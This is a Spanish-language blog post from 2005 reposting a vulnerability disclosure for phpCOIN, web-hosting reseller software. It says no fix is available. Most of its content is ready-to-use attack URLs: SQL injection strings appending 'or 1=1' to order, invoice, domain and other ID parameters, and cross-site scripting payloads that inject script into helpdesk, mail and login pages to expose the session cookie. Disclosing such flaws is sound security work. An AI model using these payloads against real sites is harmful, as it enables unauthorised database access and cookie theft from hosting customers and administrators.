phpCOIN es un software libre , utilizado para webs de hosting resellers , ...
bueno, directamente os lo copio de mi amigo lostmon , lo vereis más claramente:
############sql injection:############
dislose some sql data...
http://[target]phpcoin/mod.php?mod=siteinfo&id=1'ummm them ...
http://[target]phpcoin/mod.php?mod=faq&mode=show&faq_id=2%20or%201=1
http://[target]phpcoin/mod.php?mod=pages&mode=view&id=25%20or%201=1
http://[target]phpcoin/mod.php?mod=siteinfo&id=4%20or%201=1
http://[target]phpcoin/mod.php?mod=articles&mode=list&dtopic_id=1%20or%201=1
http://[target]phpcoin/mod.php?mod=orders&mode=view&ord_id=1002%20or%201=1
http://[target]phpcoin/mod.php?mod=domains&mode=view&dom_id=2%20or%201=1
http://[target]phpcoin/mod.php?mod=invoices&mode=view&invc_id=1002%20or%201=1
#################cross site scripting#################
http://[target]phpcoin/mod.php?mod=helpdesk&mode=new%22%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E
http://[target]phpcoin/mod.php?mod=mail&mode=reset&w=user%22%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E
http://[target]phpcoin/login.php?w=user&o=login&e=u%22%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E
http://[target]phpcoin/login.php?w=admin&o=login%22%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E
Other script are subceptibles to injection html or javascript code...
##################versions afected
##################1.2.01.2.1b1.2.1
##########Solution :
##########no solution was avaible at this time look for vendor information or for new release versions.
Creditos:
atentamente:Lostmon (lostmon@gmail.com)Thnx to estrella to be my ligthThnx to all who belibed in meWeb-Blog: http://lostmon.blogspot.com La curiosidad es lo que hace mover la mente....
-------------------------------------------------------------------
Opinión personal:
Muchas gracias Lostmon por darnos a conocer este valioso bug de phpCOIN , espero que sigas publicando muchos más de este tipo :D
sábado, marzo 05, 2005
Suscribirse a:
Entradas (Atom)